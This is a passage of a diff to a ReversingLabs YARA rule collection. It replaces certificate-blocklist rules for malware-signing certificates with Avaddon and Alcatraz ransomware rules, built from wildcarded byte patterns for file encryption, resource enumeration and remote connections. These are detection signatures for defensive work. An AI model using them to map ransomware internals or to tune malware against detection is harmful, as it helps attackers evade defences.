C3 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 89 B5 ?? ?? ?? ?? 56 53 FF + } + $encrypt_files_p2 = { + 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D 56 ?? 8B 85 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 C8 8D 85 ?? ?? ?? ?? + 3B 8D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 50 6A ?? 0F 44 F2 56 6A ?? + FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 + ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF D7 BA ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 FF B5 + ?? ?? ?? ?? FF D6 B3 ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? + ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 + ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B + 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PlanView, Inc." and pe.signatures[i].serial=="1f:4c:22:da:11:07:d2:0c:1e:da:04:56:9d:58:e5:73" and 1366156799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4Fe68D48634893D18De040D8F1C289D2 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Avaddon : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Avaddon ransomware." author = "ReversingLabs" - id = "40aed582-2960-5b42-acde-7350a2595b4b" - date = "2023-11-08" - modified = "2023-11-08" + id = "f3a57482-5799-594b-bcfa-1137ca04dfd5" + date = "2020-10-19" + modified = "2020-10-19" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L495-L511" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "41feebc8800a084ac369b5c5721b1362d371bd503b67823986bad2839157a4b0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Avaddon.yara#L1-L148" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1b2c449d5bad02dd06cb4a980fcca1feaf02b1d8127096bb39deecbc544272a6" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Avaddon" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xinghua Yile Network Tech Co.,Ltd." and pe.signatures[i].serial=="4f:e6:8d:48:63:48:93:d1:8d:e0:40:d8:f1:c2:89:d2" and 1371081600<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_6767Def972D6Ea702D8C8A53Af1832D3 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "c60497b4-5abe-52b0-aac9-88953ea6cdf1" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L513-L529" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "aa7f997449b4b8dcf488cfb7f45ee98ca540d39fb861f5b01ff4bb4aa1875b72" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files = { + 8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B + 7D ?? 2B CA D1 F9 8B C7 41 F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F 5B C9 C3 56 8D 5F + ?? 03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? + ?? ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 75 ?? 8B 7D ?? 8B CF E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 56 E8 ?? ?? ?? ?? + 59 EB ?? 8B 47 ?? 89 30 83 47 ?? ?? 33 DB 6A ?? E8 ?? ?? ?? ?? 59 8B C3 5E EB ?? 33 + C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 89 8D ?? ?? ?? ?? 56 57 3B D3 74 ?? 0F + B7 02 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 84 C0 75 ?? 83 EA ?? 3B D3 75 ?? 8B 8D ?? + ?? ?? ?? 0F B7 32 83 FE ?? 75 ?? 8D 43 ?? 3B D0 74 ?? 51 33 FF 57 57 53 E8 ?? ?? ?? + ?? 83 C4 ?? E9 ?? ?? ?? ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 2B D3 0F B6 C0 D1 FA + 42 F7 D8 1B C0 33 FF 57 57 23 C2 57 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 53 FF + 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 + C4 ?? 8B F8 E9 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 6A ?? 89 8D ?? ?? ?? ?? 59 66 39 + 8D ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD + ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 8B 85 ?? ?? ?? + ?? 59 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? + ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B F8 56 FF 15 ?? ?? ?? + ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + } + $encrypt_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 45 ?? 8B + 7D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? C7 45 ?? ?? + ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 + } + $encrypt_files_p2 = { + 6A ?? 8D 45 ?? 0F 57 C0 50 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 6A ?? 51 8D 45 ?? 0F 43 45 ?? 68 ?? ?? ?? + ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 + ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 F6 39 75 ?? 0F 86 ?? ?? ?? ?? 83 + 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 45 ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 4D ?? 03 C6 + 50 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F + 43 45 ?? 53 51 50 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? + ?? 83 7D ?? ?? 8D 4D ?? 6A ?? 51 8D 45 ?? 0F 43 45 ?? 53 50 57 FF 15 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 3B 75 ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 74 + } + $encrypt_files_p3 = { + 8B 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 51 52 57 89 55 ?? 89 4D ?? FF + 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 9D ?? ?? ?? ?? 83 7B ?? ?? 8D 43 ?? 72 ?? 8B 00 6A ?? + 8D 4D ?? 51 FF 73 ?? 50 57 FF D6 85 C0 74 ?? 8B 4B ?? 39 4D ?? 75 ?? 8B 45 ?? 89 85 + ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 6A ?? 8D 85 ?? ?? + ?? ?? 89 4D ?? 50 57 C7 45 ?? ?? ?? ?? ?? FF D6 85 C0 74 ?? 83 7D ?? ?? 75 ?? B3 ?? + EB ?? 32 DB 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 + ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 + 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? + ?? ?? ?? 83 C4 ?? 8A C3 EB ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D + ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 + } + $remote_connection_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 C9 8B 75 ?? 89 85 ?? + ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? 66 89 8D ?? ?? ?? ?? 89 4D ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 66 39 4E ?? 0F 86 ?? ?? + ?? ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 8B 06 8D 8D ?? ?? ?? ?? + 8B 7E ?? BA ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 72 ?? 8B 00 6A + ?? 6A ?? 57 FF B5 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F8 89 BD ?? + ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? + ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? + ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 + 89 85 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7E ?? ?? 8D 46 ?? 0F B7 4E ?? 72 ?? 8B + } + $remote_connection_p2 = { + 00 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 51 50 57 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7E ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B D0 83 7A ?? ?? 72 ?? 8B 12 83 7E ?? ?? 8D 4E ?? 72 ?? 8B 09 83 7E ?? ?? 8D 46 ?? + 72 ?? 8B 00 6A ?? 57 6A ?? 6A ?? 52 51 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 95 + ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? + ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 + ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 46 ?? 85 C0 + 75 ?? 50 50 50 50 57 FF 15 ?? ?? ?? ?? EB ?? 83 C6 ?? 83 7E ?? ?? 72 ?? 8B 36 50 56 + 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 + } + $enum_resources_p1 = { + 33 D2 89 7D ?? 89 7D ?? 89 75 ?? 89 45 ?? 89 45 ?? 89 4D ?? 89 55 ?? 89 55 ?? 39 56 + ?? 0F 84 ?? ?? ?? ?? 89 55 ?? 89 55 ?? 89 55 ?? 89 55 ?? 83 7E ?? ?? 8B C6 72 ?? 8B + 06 8D 4D ?? 51 8D 4D ?? 51 8D 4D ?? 51 6A ?? 8D 4D ?? 51 6A ?? 50 FF 15 ?? ?? ?? ?? + 89 45 ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8B 45 ?? 89 45 ?? + C7 45 ?? ?? ?? ?? ?? 0F 82 + } + $enum_resources_p2 = { + 8D 4D ?? D1 F8 50 52 E8 ?? ?? ?? ?? 8B 7D ?? 8D 4D ?? 8B 75 ?? 83 FF ?? 8B 55 ?? 6A + ?? 68 ?? ?? ?? ?? 0F 43 CE 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? + 8B 7D ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 33 C0 8B 75 ?? 66 89 85 ?? ?? ?? ?? 83 CE ?? + 8B 47 ?? 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 + 75 ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? + ?? 8B C7 72 ?? 8B 07 FF 77 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? E8 + } + $enum_resources_p3 = { + 53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ?? + ?? 64 A1 ?? ?? ?? ?? 50 53 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50 8D 45 ?? + 64 A3 ?? ?? ?? ?? 8B 43 ?? 8D 4D ?? 89 45 ?? 89 45 ?? 66 8B 43 ?? 6A ?? 68 ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? + 8D 4D ?? 8D 45 ?? 0F 43 45 ?? 51 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? + 8B 75 ?? 8D 4D ?? 8B 55 ?? 83 FF ?? 0F 43 45 ?? 0F 43 CA 8D 04 70 89 45 ?? 8D 45 ?? + 0F 43 45 ?? 8D 04 70 3B C8 74 ?? 66 83 39 ?? 74 ?? 83 C1 ?? 3B C8 75 ?? 3B C8 74 ?? + 8D 51 ?? 3B D0 74 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Guangzhou typical corner Network Technology Co., Ltd." and pe.signatures[i].serial=="67:67:de:f9:72:d6:ea:70:2d:8c:8a:53:af:18:32:d3" and 1361750400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($enum_resources_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_06477E3425F1448995Ced539789E6842 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Alcatraz : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Alcatraz ransomware." author = "ReversingLabs" - id = "21da6056-bf4e-5fc4-bef5-37010ebe8f05" - date = "2023-11-08" - modified = "2023-11-08" + id = "7ff37483-ae63-5c82-a355-81ef68e2f663" + date = "2020-07-28" + modified = "2020-07-28" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L531-L547" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c0bc7808bb6bcc8273a887203c1b47d1a49fcb7719863e6bc97b5c7404a254f7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Alcatraz.yara#L1-L91" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ddd35c8da0c08bce17cacfba8bb8a8b8a8c08c3e59261a88a79c63b03d29000f" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Alcatraz" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A + ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 + ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? + ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 + BD ?? ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? + ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? + ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 + ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? + ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 D0 85 D2 75 ?? 83 7D ?? ?? 74 ?? 6A + ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? + 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? + 75 ?? 83 C8 ?? EB ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? + ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? + 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $remote_server = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? + 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ?? + ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 6A + ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D + ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 + ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 + ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 + 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 C2 ?? 52 6A ?? 8B 45 + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 FF 15 + ?? ?? ?? ?? 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B + 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 3B 45 ?? 73 ?? 8B 4D ?? 03 4D ?? 0F BE 11 83 FA ?? + 74 ?? 8B 45 ?? 03 45 ?? 0F BE 08 83 F9 ?? 74 ?? 8B 55 ?? 03 55 ?? 8B 45 ?? 03 45 ?? + 8A 08 88 0A EB ?? 8B 55 ?? 03 55 ?? C6 02 ?? EB ?? EB ?? EB ?? 83 7D ?? ?? 0F 87 ?? + ?? ?? ?? 83 7D ?? ?? 75 ?? 83 C8 ?? EB ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 FF 15 ?? ?? + ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 + FF 15 ?? ?? ?? ?? 8B E5 5D C3 + } + $remote_server_2 = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 89 45 ?? A1 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8B 15 ?? ?? ?? ?? 52 + A1 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 0D ?? ?? ?? ?? 51 68 + ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? + 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? + ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 68 + ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? + ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? + 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 55 ?? + 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D + 45 ?? 50 8B 4D ?? 51 